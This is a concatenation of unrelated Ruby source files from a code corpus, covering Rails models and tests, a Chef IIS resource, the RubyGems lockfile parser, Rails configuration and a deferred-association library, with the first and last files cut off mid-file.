validates :username, uniqueness: true
has_secure_password
has_many :character_notes
has_many :matchup_notes
end
| 22.222222 | 41 | 0.76 |
ed496b7941127d616e2fe51eef5b270c73fc33a5 | 354 | require_relative '../../spec_helper'
describe "Regexp.last_match" do
it "returns MatchData instance when not passed arguments" do
/c(.)t/ =~ 'cat'
Regexp.last_match.should be_kind_of(MatchData)
end
it "returns the nth field in this MatchData when passed a Fixnum" do
/c(.)t/ =~ 'cat'
Regexp.last_match(1).should == 'a'
end
end
| 23.6 | 70 | 0.680791 |
1dfba884dd1c0322e910dd97bcbb506b3e88e9f5 | 146 | # Generated via
# `rails generate hyrax:work Fact`
module Hyrax
module Actors
class FactActor < Hyrax::Actors::BaseActor
end
end
end
| 16.222222 | 46 | 0.712329 |
084c9bdfe2a7887ca1a724daedac195b4faf8d15 | 878 | opal_filter "Opal::Parser" do
fails "Singleton classes returns an empty s(:scope) when given an empty body"
fails "Singleton classes should accept any expressions for singleton part"
fails "Strings from %Q construction should match '{' and '}' pairs used to start string before ending match"
fails "Strings from %Q construction should match '(' and ')' pairs used to start string before ending match"
fails "Strings from %Q construction should match '[' and ']' pairs used to start string before ending match"
fails "x-strings created using %x notation should match '{' and '}' pairs used to start string before ending match"
fails "x-strings created using %x notation should match '(' and ')' pairs used to start string before ending match"
fails "x-strings created using %x notation should match '[' and ']' pairs used to start string before ending match"
end
| 79.818182 | 117 | 0.748292 |
ede74bcc588bc8487c539a1605dd53e432b54961 | 108 | class Patient < ActiveRecord::Base
has_many :appointments
has_many :doctors, through: :appointments
end
| 21.6 | 43 | 0.787037 |
39b6b8bc5247fa9fee200c2bcbe52ed9b03e2a11 | 496 | # Be sure to restart your server when you modify this file.
# Add new mime types for use in respond_to blocks:
# Mime::Type.register "text/richtext", :rtf
Mime::Type.register 'text/turtle', :ttl
Mime::Type.register 'application/n-triples', :nt
# Add new mime types for files in "public" directory
# See https://stackoverflow.com/a/45470372
Rack::Mime::MIME_TYPES[".ttl"]="text/turtle"
Rack::Mime::MIME_TYPES[".nt"]="application/n-triples"
Rack::Mime::MIME_TYPES[".json"]="application/json-ld"
| 35.428571 | 59 | 0.733871 |
79718b60ac4c7dc135764740187614fa0dfb3fab | 820 | require "test_helper"
describe RootController do
setup do
stub_user_session
end
context "the start page" do
setup do
# create some books
FactoryBot.create_list(:book, 8)
end
should "be a successful request" do
get :start
assert response.successful?
end
should "load eight books to display to the user" do
get :start
assert_equal 8, assigns(:books).count
assert_instance_of Book, assigns(:books).first
end
should "load 3 recently added copies to display to the user" do
get :start
assert_equal 3, assigns(:recently_added_copies).count
assert_instance_of Copy, assigns(:recently_added_copies).first
end
should "render the start template" do
get :start
assert_template "start"
end
end
end
| 20 | 68 | 0.67439 |
189700e9975b1d926ea7a144ee1c617216aad539 | 1,167 | #
# Author:: Kendrick Martin ([email protected])
# Contributor:: David Dvorak ([email protected])
# Cookbook Name:: iis
# Resource:: config
#
# Copyright:: 2011, Webtrends Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'chef/mixin/shell_out'
include Chef::Mixin::ShellOut
include Windows::Helper
action :config do
cmd = "#{appcmd} set config #{@new_resource.cfg_cmd}"
Chef::Log.debug(cmd)
shell_out!(cmd, :returns => @new_resource.returns)
Chef::Log.info("IIS Config command run")
@new_resource.updated_by_last_action(true)
end
private
def appcmd
@appcmd ||= begin
"#{node['iis']['home']}\\appcmd.exe"
end
end
| 28.463415 | 74 | 0.735219 |
28c08cfa5c6b613d40a93a4025e55340cc483745 | 120 | require 'spree_core'
require 'spree_extension'
require 'spree_simple_sales/engine'
require 'spree_simple_sales/version'
| 24 | 36 | 0.85 |
e880c35512155334372f8b6faf4fc79ce847f1f6 | 1,301 | # == Schema Info
# Schema version: 20100924060552
#
# Table name: definition_definition_forms
#
# id :integer not null, primary key
# def1_id :integer
# def2_id :integer
# created_by :string(80)
# relationship_from :string(256)
# relationship_to :string(256)
# role :string(128)
# update_history :text
# updated_by :string(80)
# created_at :string(80)
# updated_at :string(80)
module Dictionary
class DefinitionDefinitionForm < DictionaryRecord
belongs_to :definition_to, :class_name => "Definition", :foreign_key => "def2_id"
belongs_to :definition_from, :class_name => "Definition", :foreign_key => "def1_id"
has_one :meta, :foreign_key => 'definition_definition_form_id'
def displayFromInfoPublic
str = ""
if relationship_to == 'future form' then
str += "future tense"
else
if relationship_to == 'imperative form' then
str += "imperative tense"
else
str += relationship_to unless relationship_to == nil
end
end
return str
end
def displayFromTerm
str = ""
str += definition_to.term unless definition_to == nil or definition_to.term == nil
return str
end
end
end | 28.911111 | 88 | 0.624135 |
87747890fb0bd059bbc973b313ed3540920ea57a | 1,389 | # typed: true
# frozen_string_literal: true
module Tasker
module Constants
module WorkflowStepStatuses
PENDING = 'pending'
IN_PROGRESS = 'in_progress'
ERROR = 'error'
COMPLETE = 'complete'
RESOLVED_MANUALLY = 'resolved_manually'
CANCELLED = 'cancelled'
end
module TaskStatuses
PENDING = 'pending'
IN_PROGRESS = 'in_progress'
ERROR = 'error'
COMPLETE = 'complete'
RESOLVED_MANUALLY = 'resolved_manually'
CANCELLED = 'cancelled'
end
VALID_WORKFLOW_STEP_STATUSES = [
WorkflowStepStatuses::PENDING,
WorkflowStepStatuses::IN_PROGRESS,
WorkflowStepStatuses::ERROR,
WorkflowStepStatuses::COMPLETE,
WorkflowStepStatuses::CANCELLED,
WorkflowStepStatuses::RESOLVED_MANUALLY
].freeze
VALID_TASK_STATUSES = [
TaskStatuses::PENDING,
TaskStatuses::IN_PROGRESS,
TaskStatuses::ERROR,
TaskStatuses::COMPLETE,
TaskStatuses::CANCELLED,
TaskStatuses::RESOLVED_MANUALLY
].freeze
VALID_STEP_COMPLETION_STATES = [
WorkflowStepStatuses::COMPLETE,
WorkflowStepStatuses::RESOLVED_MANUALLY,
WorkflowStepStatuses::CANCELLED
].freeze
VALID_STEP_STILL_WORKING_STATES = [WorkflowStepStatuses::PENDING, WorkflowStepStatuses::IN_PROGRESS].freeze
UNKNOWN = 'unknown'
DEFAULT_RETRY_LIMIT = 3
end
end
| 26.207547 | 111 | 0.696184 |
bfcf9e20a4a9defad4ceb1939c9156854cae17f4 | 153 | require "spec_helper"
describe ConvenientGrouper::Error do
it "is a StandardError" do
expect(described_class.new).to be_a StandardError
end
end
| 19.125 | 53 | 0.777778 |
b9423fc8ba3b776a65093b09c8352cb95fb386d3 | 3,129 | secrets = Rails.application.secrets.mailer
OnlineReportingTool::Application.configure do
# Settings specified here will take precedence over those in config/application.rb
# Code is not reloaded between requests
config.cache_classes = true
# Full error reports are disabled and caching is turned on
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Disable Rails's static asset server (Apache or nginx will already do this)
config.serve_static_assets = false
# Compress JavaScripts and CSS
config.assets.compress = true
# Don't fallback to assets pipeline if a precompiled asset is missed
config.assets.compile = false
# Generate digests for assets URLs
config.assets.digest = true
# Defaults to nil and saved in location specified by config.assets.prefix
# config.assets.manifest = YOUR_PATH
# Specifies the header that your server uses for sending files
# config.action_dispatch.x_sendfile_header = "X-Sendfile" # for apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for nginx
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# See everything in the log (default is :info)
config.log_level = :debug
# Prepend all log lines with the following tags
# config.log_tags = [ :subdomain, :uuid ]
# Use a different logger for distributed setups
# config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)
# Use a different cache store in production
# config.cache_store = :mem_cache_store
# Enable serving of images, stylesheets, and JavaScripts from an asset server
# config.action_controller.asset_host = "http://assets.example.com"
# Precompile additional assets (application.js, application.css, and all non-JS/CSS are already added)
# config.assets.precompile += %w( search.js )
# Disable delivery errors, bad email addresses will be ignored
config.action_mailer.raise_delivery_errors = true
config.action_mailer.delivery_method = :smtp
config.action_mailer.asset_host = secrets['asset_host']
config.action_mailer.default_url_options = {:host => secrets['host']}
config.action_mailer.smtp_settings = {
:enable_starttls_auto => true,
:address => secrets['address'],
:port => secrets['port'],
:domain => secrets['domain'],
:authentication => :login,
:user_name => secrets['username'],
:password => secrets['password']
}
# Enable threaded mode
# config.threadsafe!
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation can not be found)
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners
config.active_support.deprecation = :notify
# Raise exception on mass assignment protection for Active Record models
config.active_record.mass_assignment_sanitizer = :strict
# Log the query plan for queries taking more than this (works
# with SQLite, MySQL, and PostgreSQL)
config.active_record.auto_explain_threshold_in_seconds = 0.5
end
| 36.811765 | 104 | 0.753276 |
114038bfcf8b4c9b4bbf867b7ad082c322e78226 | 13,605 | require 'strscan'
##
# Parses a gem.deps.rb.lock file and constructs a LockSet containing the
# dependencies found inside. If the lock file is missing no LockSet is
# constructed.
class Gem::RequestSet::Lockfile
##
# Raised when a lockfile cannot be parsed
class ParseError < Gem::Exception
##
# The column where the error was encountered
attr_reader :column
##
# The line where the error was encountered
attr_reader :line
##
# The location of the lock file
attr_reader :path
##
# Raises a ParseError with the given +message+ which was encountered at a
# +line+ and +column+ while parsing.
def initialize message, column, line, path
@line = line
@column = column
@path = path
super "#{message} (at line #{line} column #{column})"
end
end
##
# The platforms for this Lockfile
attr_reader :platforms
##
# Creates a new Lockfile for the given +request_set+ and +gem_deps_file+
# location.
def initialize request_set, gem_deps_file
@set = request_set
@gem_deps_file = File.expand_path(gem_deps_file)
@gem_deps_dir = File.dirname(@gem_deps_file)
@current_token = nil
@line = 0
@line_pos = 0
@platforms = []
@tokens = []
end
def add_DEPENDENCIES out # :nodoc:
out << "DEPENDENCIES"
@requests.sort_by { |r| r.name }.each do |request|
spec = request.spec
if [Gem::Resolver::VendorSpecification,
Gem::Resolver::GitSpecification].include? spec.class then
out << " #{request.name}!"
else
requirement = request.request.dependency.requirement
out << " #{request.name}#{requirement.for_lockfile}"
end
end
out << nil
end
def add_GEM out # :nodoc:
return if @spec_groups.empty?
source_groups = @spec_groups.values.flatten.group_by do |request|
request.spec.source.uri
end
source_groups.sort_by { |group,| group.to_s }.map do |group, requests|
out << "GEM"
out << " remote: #{group}"
out << " specs:"
requests.sort_by { |request| request.name }.each do |request|
platform = "-#{request.spec.platform}" unless
Gem::Platform::RUBY == request.spec.platform
out << " #{request.name} (#{request.version}#{platform})"
request.full_spec.dependencies.sort.each do |dependency|
requirement = dependency.requirement
out << " #{dependency.name}#{requirement.for_lockfile}"
end
end
out << nil
end
end
def add_GIT out
return unless git_requests =
@spec_groups.delete(Gem::Resolver::GitSpecification)
by_repository_revision = git_requests.group_by do |request|
source = request.spec.source
[source.repository, source.rev_parse]
end
out << "GIT"
by_repository_revision.each do |(repository, revision), requests|
out << " remote: #{repository}"
out << " revision: #{revision}"
out << " specs:"
requests.sort_by { |request| request.name }.each do |request|
out << " #{request.name} (#{request.version})"
dependencies = request.spec.dependencies.sort_by { |dep| dep.name }
dependencies.each do |dep|
out << " #{dep.name}#{dep.requirement.for_lockfile}"
end
end
end
out << nil
end
def relative_path_from dest, base # :nodoc:
dest = File.expand_path(dest)
base = File.expand_path(base)
if dest.index(base) == 0
return dest[base.size+1..-1]
else
dest
end
end
def add_PATH out # :nodoc:
return unless path_requests =
@spec_groups.delete(Gem::Resolver::VendorSpecification)
out << "PATH"
path_requests.each do |request|
directory = File.expand_path(request.spec.source.uri)
out << " remote: #{relative_path_from directory, @gem_deps_dir}"
out << " specs:"
out << " #{request.name} (#{request.version})"
end
out << nil
end
def add_PLATFORMS out # :nodoc:
out << "PLATFORMS"
platforms = @requests.map { |request| request.spec.platform }.uniq
platforms.delete Gem::Platform::RUBY if platforms.length > 1
platforms.each do |platform|
out << " #{platform}"
end
out << nil
end
##
# Gets the next token for a Lockfile
def get expected_types = nil, expected_value = nil # :nodoc:
@current_token = @tokens.shift
type, value, column, line = @current_token
if expected_types and not Array(expected_types).include? type then
unget
message = "unexpected token [#{type.inspect}, #{value.inspect}], " +
"expected #{expected_types.inspect}"
raise ParseError.new message, column, line, "#{@gem_deps_file}.lock"
end
if expected_value and expected_value != value then
unget
message = "unexpected token [#{type.inspect}, #{value.inspect}], " +
"expected [#{expected_types.inspect}, " +
"#{expected_value.inspect}]"
raise ParseError.new message, column, line, "#{@gem_deps_file}.lock"
end
@current_token
end
def parse # :nodoc:
tokenize
until @tokens.empty? do
type, data, column, line = get
case type
when :section then
skip :newline
case data
when 'DEPENDENCIES' then
parse_DEPENDENCIES
when 'GIT' then
parse_GIT
when 'GEM' then
parse_GEM
when 'PATH' then
parse_PATH
when 'PLATFORMS' then
parse_PLATFORMS
else
type, = get until @tokens.empty? or peek.first == :section
end
else
raise "BUG: unhandled token #{type} (#{data.inspect}) at line #{line} column #{column}"
end
end
end
def parse_DEPENDENCIES # :nodoc:
while not @tokens.empty? and :text == peek.first do
_, name, = get :text
requirements = []
case peek[0]
when :bang then
get :bang
spec = @set.sets.select { |set|
Gem::Resolver::GitSet === set or
Gem::Resolver::VendorSet === set
}.map { |set|
set.specs[name]
}.first
requirements << spec.version
when :l_paren then
get :l_paren
loop do
_, op, = get :requirement
_, version, = get :text
requirements << "#{op} #{version}"
break unless peek[0] == :comma
get :comma
end
get :r_paren
end
@set.gem name, *requirements
skip :newline
end
end
def parse_GEM # :nodoc:
sources = []
while [:entry, 'remote'] == peek.first(2) do
get :entry, 'remote'
_, data, = get :text
skip :newline
sources << Gem::Source.new(data)
end
sources << Gem::Source.new(Gem::DEFAULT_HOST) if sources.empty?
get :entry, 'specs'
skip :newline
set = Gem::Resolver::LockSet.new sources
last_specs = nil
while not @tokens.empty? and :text == peek.first do
_, name, column, = get :text
case peek[0]
when :newline then
last_specs.each do |spec|
spec.add_dependency Gem::Dependency.new name if column == 6
end
when :l_paren then
get :l_paren
type, data, = get [:text, :requirement]
if type == :text and column == 4 then
version, platform = data.split '-', 2
platform =
platform ? Gem::Platform.new(platform) : Gem::Platform::RUBY
last_specs = set.add name, version, platform
else
dependency = parse_dependency name, data
last_specs.each do |spec|
spec.add_dependency dependency
end
end
get :r_paren
else
raise "BUG: unknown token #{peek}"
end
skip :newline
end
@set.sets << set
end
def parse_GIT # :nodoc:
get :entry, 'remote'
_, repository, = get :text
skip :newline
get :entry, 'revision'
_, revision, = get :text
skip :newline
type, value = peek.first 2
if type == :entry and %w[branch ref tag].include? value then
get
get :text
skip :newline
end
get :entry, 'specs'
skip :newline
set = Gem::Resolver::GitSet.new
last_spec = nil
while not @tokens.empty? and :text == peek.first do
_, name, column, = get :text
case peek[0]
when :newline then
last_spec.add_dependency Gem::Dependency.new name if column == 6
when :l_paren then
get :l_paren
type, data, = get [:text, :requirement]
if type == :text and column == 4 then
last_spec = set.add_git_spec name, data, repository, revision, true
else
dependency = parse_dependency name, data
last_spec.spec.dependencies << dependency
end
get :r_paren
else
raise "BUG: unknown token #{peek}"
end
skip :newline
end
@set.sets << set
end
def parse_PATH # :nodoc:
get :entry, 'remote'
_, directory, = get :text
skip :newline
get :entry, 'specs'
skip :newline
set = Gem::Resolver::VendorSet.new
last_spec = nil
while not @tokens.empty? and :text == peek.first do
_, name, column, = get :text
case peek[0]
when :newline then
last_spec.add_dependency Gem::Dependency.new name if column == 6
when :l_paren then
get :l_paren
type, data, = get [:text, :requirement]
if type == :text and column == 4 then
last_spec = set.add_vendor_gem name, directory
else
dependency = parse_dependency name, data
last_spec.spec.dependencies << dependency
end
get :r_paren
else
raise "BUG: unknown token #{peek}"
end
skip :newline
end
@set.sets << set
end
def parse_PLATFORMS # :nodoc:
while not @tokens.empty? and :text == peek.first do
_, name, = get :text
@platforms << name
skip :newline
end
end
##
# Parses the requirements following the dependency +name+ and the +op+ for
# the first token of the requirements and returns a Gem::Dependency object.
def parse_dependency name, op # :nodoc:
return Gem::Dependency.new name unless peek[0] == :text
_, version, = get :text
requirements = ["#{op} #{version}"]
while peek[0] == :comma do
get :comma
_, op, = get :requirement
_, version, = get :text
requirements << "#{op} #{version}"
end
Gem::Dependency.new name, requirements
end
##
# Peeks at the next token for Lockfile
def peek # :nodoc:
@tokens.first || [:EOF]
end
def skip type # :nodoc:
get while not @tokens.empty? and peek.first == type
end
##
# The contents of the lock file.
def to_s
@set.resolve
out = []
@requests = @set.sorted_requests
@spec_groups = @requests.group_by do |request|
request.spec.class
end
add_PATH out
add_GIT out
add_GEM out
add_PLATFORMS out
add_DEPENDENCIES out
out.join "\n"
end
##
# Calculates the column (by byte) and the line of the current token based on
# +byte_offset+.
def token_pos byte_offset # :nodoc:
[byte_offset - @line_pos, @line]
end
##
# Converts a lock file into an Array of tokens. If the lock file is missing
# an empty Array is returned.
def tokenize # :nodoc:
@line = 0
@line_pos = 0
@platforms = []
@tokens = []
@current_token = nil
lock_file = "#{@gem_deps_file}.lock"
@input = File.read lock_file
s = StringScanner.new @input
until s.eos? do
pos = s.pos
pos = s.pos if leading_whitespace = s.scan(/ +/)
if s.scan(/[<|=>]{7}/) then
message = "your #{lock_file} contains merge conflict markers"
column, line = token_pos pos
raise ParseError.new message, column, line, lock_file
end
@tokens <<
case
when s.scan(/\r?\n/) then
token = [:newline, nil, *token_pos(pos)]
@line_pos = s.pos
@line += 1
token
when s.scan(/[A-Z]+/) then
if leading_whitespace then
text = s.matched
text += s.scan(/[^\s)]*/).to_s # in case of no match
[:text, text, *token_pos(pos)]
else
[:section, s.matched, *token_pos(pos)]
end
when s.scan(/([a-z]+):\s/) then
s.pos -= 1 # rewind for possible newline
[:entry, s[1], *token_pos(pos)]
when s.scan(/\(/) then
[:l_paren, nil, *token_pos(pos)]
when s.scan(/\)/) then
[:r_paren, nil, *token_pos(pos)]
when s.scan(/<=|>=|=|~>|<|>|!=/) then
[:requirement, s.matched, *token_pos(pos)]
when s.scan(/,/) then
[:comma, nil, *token_pos(pos)]
when s.scan(/!/) then
[:bang, nil, *token_pos(pos)]
when s.scan(/[^\s),!]*/) then
[:text, s.matched, *token_pos(pos)]
else
raise "BUG: can't create token for: #{s.string[s.pos..-1].inspect}"
end
end
@tokens
rescue Errno::ENOENT
@tokens
end
##
# Ungets the last token retrieved by #get
def unget # :nodoc:
@tokens.unshift @current_token
end
##
# Writes the lock file alongside the gem dependencies file
def write
open "#{@gem_deps_file}.lock", 'w' do |io|
io.write to_s
end
end
end
| 22.599668 | 95 | 0.579125 |
ac3c7635591219040419da6350100cebd498fcc7 | 3,964 | # Be sure to restart your server when you modify this file
# Uncomment below to force Rails into production mode when
# you don't control web/app server and can't set it the proper way
# ENV['RAILS_ENV'] ||= 'production'
# Specifies gem version of Rails to use when vendor/rails is not present
RAILS_GEM_VERSION = '2.2.2' unless defined? RAILS_GEM_VERSION
# Bootstrap the Rails environment, frameworks, and default configuration
require File.join(File.dirname(__FILE__), 'boot')
Rails::Initializer.run do |config|
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# See Rails::Configuration for more options.
# Skip frameworks you're not going to use. To use Rails without a database
# you must remove the Active Record framework.
# config.frameworks -= [ :active_record, :active_resource, :action_mailer ]
# Specify gems that this application depends on.
# They can then be installed with "rake gems:install" on new installations.
# You have to specify the :lib option for libraries, where the Gem name (sqlite3-ruby) differs from the file itself (sqlite3)
# config.gem "bj"
# config.gem "hpricot", :version => '0.6', :source => "http://code.whytheluckystiff.net"
# config.gem "sqlite3-ruby", :lib => "sqlite3"
# config.gem "aws-s3", :lib => "aws/s3"
# Only load the plugins named here, in the order given. By default, all plugins
# in vendor/plugins are loaded in alphabetical order.
# :all can be used as a placeholder for all plugins not explicitly named
# config.plugins = [ :exception_notification, :ssl_requirement, :all ]
# Add additional load paths for your own custom dirs
# config.load_paths += %W( #{RAILS_ROOT}/extras )
# Force all environments to use the same logger level
# (by default production uses :info, the others :debug)
# config.log_level = :debug
# Make Time.zone default to the specified zone, and make Active Record store time values
# in the database in UTC, and return them converted to the specified local zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Comment line to use default local time.
config.time_zone = 'UTC'
# The internationalization framework can be changed to have another default locale (standard is :en) or more load paths.
# All files from config/locales/*.rb,yml are added automatically.
# config.i18n.load_path << Dir[File.join(RAILS_ROOT, 'my', 'locales', '*.{rb,yml}')]
# config.i18n.default_locale = :de
# Your secret key for verifying cookie session data integrity.
# If you change this key, all old sessions will become invalid!
# Make sure the secret is at least 30 characters and all random,
# no regular words or you'll be exposed to dictionary attacks.
config.action_controller.session = {
:session_key => '_example_rails_app_session',
:secret => '083812545b4969fc3b9086ab594b2c238c3f90dfb1c5f1679f403a4591e7fd8770de80030f8d0c988d217788fac9d8a1eec254459faf0a0892acc4466284aec8'
}
# Use the database for sessions instead of the cookie-based default,
# which shouldn't be used to store highly confidential information
# (create the session table with "rake db:sessions:create")
# config.action_controller.session_store = :active_record_store
# Use SQL instead of Active Record's schema dumper when creating the test database.
# This is necessary if your schema can't be completely dumped by the schema dumper,
# like if you have constraints or database-specific column types
# config.active_record.schema_format = :sql
# Activate observers that should always be running
# Please note that observers generated using script/generate observer need to have an _observer suffix
# config.active_record.observers = :cacher, :garbage_collector, :forum_observer
end
require 'aux_codes'
AuxCode.init | 50.820513 | 150 | 0.752775 |
1a47c70c0c8a7e51ccc1bd92668f4f61a738fea4 | 586 | json.partial! 'cookbook', cookbook: @cookbook
json.deprecated @cookbook.deprecated
if @cookbook.deprecated? && @cookbook.replacement.present?
json.replacement api_v1_cookbook_url(@cookbook.replacement)
end
json.versions Array(@cookbook_versions_urls)
json.metrics do
json.downloads do
json.total @cookbook.download_count
json.set! :versions do
@cookbook.cookbook_versions.each do |version|
json.set! version.version, version.download_count
end
end
end
json.followers @cookbook.followers.size
json.collaborators @cookbook.collaborators.size
end
| 30.842105 | 61 | 0.771331 |
7a2a0707b4eff4ff882c0a4e3b00beb2e0798d40 | 619 | module IOCaptureHelper
def capture_io(&block)
original_stdout = $stdout
original_stderr = $stderr
captured_stdout = StringIO.new
captured_stderr = StringIO.new
$stdout = captured_stdout
$stderr = captured_stderr
yield
{
stdout: captured_stdout.string,
stderr: captured_stderr.string
}
ensure
$stdout = original_stdout
$stderr = original_stderr
end
def silent_io
original_stdout = $stdout
original_stderr = $stderr
$stdout = $stderr = StringIO.new
yield
ensure
$stdout = original_stdout
$stderr = original_stderr
end
end
| 17.685714 | 37 | 0.680129 |
4a13567db7f0709c49ee2d646775f3035809128a | 7,455 | require 'delegate'
module Deferring
class DeferredAssociation < SimpleDelegator
include Enumerable
attr_reader :load_state,
:klass,
:parent_record,
:inverse_name,
:dependent
def initialize(original_association, klass, parent_record, inverse_name, dependent)
super(original_association)
@load_state = :ghost
@klass = klass
@parent_record = parent_record
@inverse_name = inverse_name
@dependent = dependent
end
alias_method :original_association, :__getobj__
def inspect
objects.inspect
end
alias_method :pretty_inspect, :inspect
delegate :to_s, :to_a, :inspect, :==, # methods undefined by SimpleDelegator
:as_json, to: :objects
def each(&block)
objects.each(&block)
end
# TODO: Add explanation about :first/:last loaded? problem.
[:first, :last, :empty?, :size].each do |method|
define_method method do
unless objects_loaded?
original_association.send(method)
else
objects.send(method)
end
end
end
# Delegates methods from Ruby's Array module to the object in the deferred
# association.
delegate :[]=, :[], :clear, :select!, :reject!, :flatten, :flatten!, :sort!,
:keep_if, :delete_if, :sort_by!, :length,
:each_index,
to: :objects
# Delegates Ruby's Enumerable#find method to the original association.
#
# The delegation has to be explicit in this case, because the inclusion of
# Enumerable also defines the find-method on DeferredAssociation.
def find(*args, &block)
if block_given?
objects.find(&block)
else
original_association.find(*args)
end
end
# Delegates Ruby's Enumerable#count method to the original association.
#
# The delegation has to be explicit in this case, because the inclusion of
# Enumerable also defines the count-method on DeferredAssociation.
def count(*args, &block)
if block_given?
objects.count(*args, &block)
else
original_association.count(*args)
end
end
# Delegates Ruby's Enumerable#select method to the original association when
# no block has been given. Rails' select-method does not accept a block, so
# we know that in that case the select-method has to be called on our
# deferred association.
#
# The delegation has to be explicit in this case, because the inclusion of
# Enumerable also defines the select-method on DeferredAssociation.
def select(value = nil, &block)
if block_given?
objects.select { |*block_args| block.call(*block_args) }
else
original_association.select(value)
end
end
# Rails 3.0 specific, not needed anymore for Rails 3.0+
def set_inverse_instance(associated_record, parent_record)
original_association.__send__(:set_inverse_instance, associated_record, parent_record)
end
def objects
load_objects
@objects
end
def objects=(records)
@objects = records.compact.map do |record|
if inverse_name && record.class.reflect_on_association(inverse_name)
record.send(:"#{inverse_name}=", parent_record)
end
record
end
@original_objects = original_association.to_a.clone
objects_loaded!
pending_deletes.each { |record| run_deferring_callbacks(:unlink, record) }
pending_creates.each { |record| run_deferring_callbacks(:link, record) }
@objects
end
def ids
objects.map(&:id)
end
def <<(*records)
# TODO: Do we want to prevent including the same object twice? Not sure,
# but it will probably be filtered after saving and retrieving as well.
records.flatten.compact.uniq.each do |record|
run_deferring_callbacks(:link, record) do
if inverse_name && record.class.reflect_on_association(inverse_name)
record.send(:"#{inverse_name}=", parent_record)
end
objects << record
end
end
self
end
alias_method :push, :<<
alias_method :concat, :<<
alias_method :append, :<<
def delete(*records)
records.flatten.compact.uniq.each do |record|
run_deferring_callbacks(:unlink, record) { objects.delete(record) }
end
self
end
def destroy(*records)
records.flatten.compact.uniq.each do |record|
record = record.to_i if record.is_a? String
record = objects.detect { |o| o.id == record } if record.is_a? Integer
run_deferring_callbacks(:unlink, record) {
objects.delete(record)
record.mark_for_destruction if dependent && [:destroy, :delete_all].include?(dependent)
}
end
end
def build(*args, &block)
klass.new(*args, &block).tap do |record|
run_deferring_callbacks(:link, record) do
if inverse_name && record.class.reflect_on_association(inverse_name)
record.send(:"#{inverse_name}=", parent_record)
end
objects.push(record)
end
end
end
def create(*args, &block)
association.create(*args, &block).tap do |_|
@load_state = :ghost
load_objects
end
end
def create!(*args, &block)
association.create!(*args, &block).tap do |_|
@load_state = :ghost
load_objects
end
end
def reload
original_association.reload
@load_state = :ghost
self
end
alias_method :reset, :reload
# Returns the associated records to which links will be created after saving
# the parent of the association.
def links
return [] unless objects_loaded?
objects - original_objects
end
alias_method :pending_creates, :links
# Returns the associated records to which the links will be deleted after
# saving the parent of the assocation.
def unlinks
return [] unless objects_loaded?
original_objects - objects
end
alias_method :pending_deletes, :unlinks
# Returns true if there are links that will be created or deleted when
# saving the parent of the association.
def changed_for_autosave?
links.any? || unlinks.any?
end
def add_callback_listener(event_name, callback_method)
(@listeners ||= []) << DeferredCallbackListener.new(event_name, parent_record, callback_method)
end
private
def association
load_objects
original_association
end
def load_objects
return if objects_loaded?
@objects = original_association.to_a.clone
@original_objects = @objects.clone.freeze
objects_loaded!
end
def objects_loaded?
@load_state == :loaded
end
def objects_loaded!
@load_state = :loaded
end
def original_objects
load_objects
@original_objects
end
def run_deferring_callbacks(event_name, record)
notify_callback_listeners(:"before_#{event_name}", record)
yield if block_given?
notify_callback_listeners(:"after_#{event_name}", record)
end
def notify_callback_listeners(event_name, record)
@listeners && @listeners.each do |listener|
if listener.event_name == event_name
listener.public_send(event_name, record)
end
end
end
end
end
| 28.346008 | 101 | 0.64896 |
79211375427b92e0454512790eab812a1971760d | 445 | #
# Cookbook Name:: mirna
# Spec:: default
#
# Copyright (c) 2015 The Authors, All Rights Reserved.
require 'spec_helper'
describe 'mirna::default' do
context 'When all attributes are default, on an unspecified platform' do
let(:chef_run) do
runner = ChefSpec::ServerRunner.new
runner.converge(described_recipe)
end
it 'converges successfully' do
chef_run # This should not raise an error
end
end
end
| 18.541667 | 74 | 0.696629 |
7a0d3599d66743b1d6465a748cab0a7ddb059e8f | 342 | require 'spec_helper_acceptance'
describe 'export_policy' do
it 'makes a export_policy' do
pp=<<-EOS
node 'vsim-01' {
}
node 'vserver-01' {
netapp_export_policy { 'export_policy-test' :
ensure => present,
}
}
EOS
make_site_pp(pp)
run_device(:allow_changes => true)
run_device(:allow_changes => false)
end
end
| 18 | 47 | 0.675439 |
ac31a936eb6887252582b90f2168610f834172c5 | 362 | class Sshfs < Cask
version '2.5.0'
sha256 'f8f4f71814273ea42dbe6cd92199f7cff418571ffd1b10c0608878d3472d2162'
url "https://github.com/osxfuse/sshfs/releases/download/osxfuse-sshfs-#{version}/sshfs-#{version}.pkg"
homepage 'http://osxfuse.github.io/'
license :oss
pkg "sshfs-#{version}.pkg"
uninstall :pkgutil => 'com.github.osxfuse.pkg.SSHFS'
end
| 30.166667 | 104 | 0.748619 |
288ac7d8baeac5e423cfc1fc9330dc1df6a9d589 | 2,533 | require File.join(File.dirname(__FILE__), 'test_helper')
class Sample < ActiveRecord::Base
self.table_name = 'sample'
end
class AutoIncrementTest < Minitest::Test
include TestHelper
def test_basic_table_creation
assert_auto_increments
end
def test_modified_primary_key_with_auto_increment
comment_text = "a comment on the sample table in the primary_key field"
result_comment = nil
ActiveRecord::Schema.define do
set_column_comment :sample, :id, comment_text
result_comment = retrieve_column_comment :sample, :id
end
assert_auto_increments
assert_equal comment_text, result_comment
end
def test_modified_primary_key_without_auto_increment
comment_text = "a comment on the sample table in the primary_key field"
result_comment = nil
ActiveRecord::Schema.define do
change_column :sample, :id, :integer, auto_increment: false
set_column_comment :sample, :id, comment_text
result_comment = retrieve_column_comment :sample, :id
end
assert_does_not_auto_increment
assert_equal comment_text, result_comment
end
private
def assert_does_not_auto_increment
if ENV['DB'] == 'mysql'
extra = extract_extra_attributes('id')
refute_match(/auto_increment/i, extra)
end
id = nil
